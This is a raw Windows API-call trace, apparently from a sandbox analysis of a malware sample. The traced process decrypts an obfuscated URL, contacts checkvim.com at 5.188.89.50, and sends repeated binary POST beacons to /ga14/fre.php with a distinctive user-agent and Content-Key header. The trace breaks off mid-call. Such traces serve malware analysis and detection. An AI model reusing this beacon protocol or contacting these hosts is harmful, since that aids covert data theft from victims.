(lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0325.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0325.956] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0325.957] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0325.957] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0325.958] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0325.958] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0325.958] GetProcessHeap () returned 0x840000 [0325.958] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0325.958] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0325.959] GetProcessHeap () returned 0x840000 [0325.959] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0325.959] GetProcessHeap () returned 0x840000 [0325.959] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0325.959] GetProcessHeap () returned 0x840000 [0325.959] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb00 | out: hHeap=0x840000) returned 1 [0325.959] GetProcessHeap () returned 0x840000 [0325.959] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0325.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.960] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0325.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.966] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fac8) returned 1 [0325.972] GetProcessHeap () returned 0x840000 [0325.972] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0325.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.974] CryptImportKey (in: hProv=0x86fac8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e870) returned 1 [0325.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.975] CryptSetKeyParam (hKey=0x87e870, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0325.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.976] CryptSetKeyParam (hKey=0x87e870, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0325.976] GetProcessHeap () returned 0x840000 [0325.976] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0325.977] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.977] CryptDecrypt (in: hKey=0x87e870, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0325.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.978] CryptDestroyKey (hKey=0x87e870) returned 1 [0325.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.979] CryptReleaseContext (hProv=0x86fac8, dwFlags=0x0) returned 1 [0325.979] GetProcessHeap () returned 0x840000 [0325.979] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0325.980] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0325.980] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0325.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0325.981] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0325.982] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0325.982] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0325.982] GetProcessHeap () returned 0x840000 [0325.982] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0325.982] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0325.985] GetProcessHeap () returned 0x840000 [0325.985] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0325.985] socket (af=2, type=1, protocol=6) returned 0x59c [0325.986] connect (s=0x59c, name=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0326.053] FreeAddrInfoW (pAddrInfo=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0326.053] GetProcessHeap () returned 0x840000 [0326.053] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f2d0 [0326.053] GetProcessHeap () returned 0x840000 [0326.053] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8875c8 [0326.054] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0326.057] wvsprintfA (in: param_1=0x8875c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0326.057] GetProcessHeap () returned 0x840000 [0326.057] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0326.057] GetProcessHeap () returned 0x840000 [0326.057] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0326.057] GetProcessHeap () returned 0x840000 [0326.057] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fe18 [0326.057] GetProcessHeap () returned 0x840000 [0326.057] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8875c8 [0326.058] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0326.059] wvsprintfA (in: param_1=0x8875c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0326.059] GetProcessHeap () returned 0x840000 [0326.059] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0326.059] GetProcessHeap () returned 0x840000 [0326.059] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0326.059] send (s=0x59c, buf=0x873a58*, len=237, flags=0) returned 237 [0326.059] send (s=0x59c, buf=0x87eb58*, len=159, flags=0) returned 159 [0326.059] GetProcessHeap () returned 0x840000 [0326.059] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0326.059] recv (in: s=0x59c, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0326.416] GetProcessHeap () returned 0x840000 [0326.416] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0326.416] GetProcessHeap () returned 0x840000 [0326.416] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fe18 | out: hHeap=0x840000) returned 1 [0326.416] GetProcessHeap () returned 0x840000 [0326.416] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0326.416] GetProcessHeap () returned 0x840000 [0326.416] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f2d0 | out: hHeap=0x840000) returned 1 [0326.416] closesocket (s=0x59c) returned 0 [0326.417] GetProcessHeap () returned 0x840000 [0326.417] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0326.417] GetProcessHeap () returned 0x840000 [0326.417] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0326.417] GetProcessHeap () returned 0x840000 [0326.417] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0326.417] GetProcessHeap () returned 0x840000 [0326.417] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0326.417] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1150) returned 0x59c [0326.419] Sleep (dwMilliseconds=0xea60) [0326.424] GetProcessHeap () returned 0x840000 [0326.424] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb90 [0326.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0326.425] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0326.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0326.429] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0326.434] GetProcessHeap () returned 0x840000 [0326.434] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0326.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0326.435] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e830) returned 1 [0326.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0326.436] CryptSetKeyParam (hKey=0x87e830, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0326.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0326.436] CryptSetKeyParam (hKey=0x87e830, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0326.436] GetProcessHeap () returned 0x840000 [0326.436] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0326.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0326.437] CryptDecrypt (in: hKey=0x87e830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb90, pdwDataLen=0x19f9a4 | out: pbData=0x87fb90, pdwDataLen=0x19f9a4) returned 1 [0326.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0326.438] CryptDestroyKey (hKey=0x87e830) returned 1 [0326.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0326.439] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0326.439] GetProcessHeap () returned 0x840000 [0326.439] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0326.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0326.440] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0326.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0326.441] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0326.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0326.441] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0326.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0326.442] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0326.442] GetProcessHeap () returned 0x840000 [0326.442] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871538 [0326.442] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0326.443] GetProcessHeap () returned 0x840000 [0326.443] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871538 | out: hHeap=0x840000) returned 1 [0326.443] GetProcessHeap () returned 0x840000 [0326.443] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0326.443] GetProcessHeap () returned 0x840000 [0326.443] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb90 | out: hHeap=0x840000) returned 1 [0326.443] GetProcessHeap () returned 0x840000 [0326.443] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fbd8 [0326.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0326.444] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0326.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0326.448] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0326.453] GetProcessHeap () returned 0x840000 [0326.453] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0326.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0326.453] CryptImportKey (in: hProv=0x86fce8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0326.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0326.454] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0326.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0326.464] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0326.464] GetProcessHeap () returned 0x840000 [0326.464] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0326.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0326.469] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fbd8, pdwDataLen=0x19f9a4 | out: pbData=0x87fbd8, pdwDataLen=0x19f9a4) returned 1 [0326.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0326.470] CryptDestroyKey (hKey=0x87e930) returned 1 [0326.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0326.471] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0326.471] GetProcessHeap () returned 0x840000 [0326.471] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0326.471] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0326.472] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0326.472] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0326.473] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0326.473] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0326.474] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0326.474] GetProcessHeap () returned 0x840000 [0326.474] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871420 [0326.474] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0326.516] GetProcessHeap () returned 0x840000 [0326.516] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b88 [0326.516] socket (af=2, type=1, protocol=6) returned 0x5a0 [0326.516] connect (s=0x5a0, name=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0326.591] FreeAddrInfoW (pAddrInfo=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0326.591] GetProcessHeap () returned 0x840000 [0326.591] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0326.591] GetProcessHeap () returned 0x840000 [0326.592] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8875c8 [0326.592] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0326.593] wvsprintfA (in: param_1=0x8875c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0326.593] GetProcessHeap () returned 0x840000 [0326.593] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f4f0 [0326.593] GetProcessHeap () returned 0x840000 [0326.593] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0326.593] GetProcessHeap () returned 0x840000 [0326.593] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f680 [0326.593] GetProcessHeap () returned 0x840000 [0326.593] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8875c8 [0326.594] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0326.595] wvsprintfA (in: param_1=0x8875c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0326.595] GetProcessHeap () returned 0x840000 [0326.595] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0326.595] GetProcessHeap () returned 0x840000 [0326.595] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0326.595] send (s=0x5a0, buf=0x873a58*, len=237, flags=0) returned 237 [0326.596] send (s=0x5a0, buf=0x87eb58*, len=159, flags=0) returned 159 [0326.596] GetProcessHeap () returned 0x840000 [0326.596] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0326.596] recv (in: s=0x5a0, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0326.964] GetProcessHeap () returned 0x840000 [0326.964] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0326.964] GetProcessHeap () returned 0x840000 [0326.964] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0326.964] GetProcessHeap () returned 0x840000 [0326.964] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f4f0 | out: hHeap=0x840000) returned 1 [0326.964] GetProcessHeap () returned 0x840000 [0326.964] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0326.964] closesocket (s=0x5a0) returned 0 [0326.964] GetProcessHeap () returned 0x840000 [0326.964] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b88 | out: hHeap=0x840000) returned 1 [0326.964] GetProcessHeap () returned 0x840000 [0326.964] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0326.964] GetProcessHeap () returned 0x840000 [0326.964] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fbd8 | out: hHeap=0x840000) returned 1 [0326.964] GetProcessHeap () returned 0x840000 [0326.964] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871420 | out: hHeap=0x840000) returned 1 [0326.965] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1360) returned 0x5a0 [0326.966] Sleep (dwMilliseconds=0xea60) [0326.968] GetProcessHeap () returned 0x840000 [0326.968] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0326.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0326.968] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0327.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.129] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0327.148] GetProcessHeap () returned 0x840000 [0327.148] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0327.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.149] CryptImportKey (in: hProv=0x86fce8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2f0) returned 1 [0327.150] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.150] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0327.151] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.151] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0327.151] GetProcessHeap () returned 0x840000 [0327.151] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0327.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.153] CryptDecrypt (in: hKey=0x87e2f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0327.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.155] CryptDestroyKey (hKey=0x87e2f0) returned 1 [0327.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.156] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0327.157] GetProcessHeap () returned 0x840000 [0327.157] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0327.157] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0327.158] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0327.159] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0327.165] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0327.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0327.166] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0327.167] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0327.167] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0327.167] GetProcessHeap () returned 0x840000 [0327.167] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713d0 [0327.167] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: 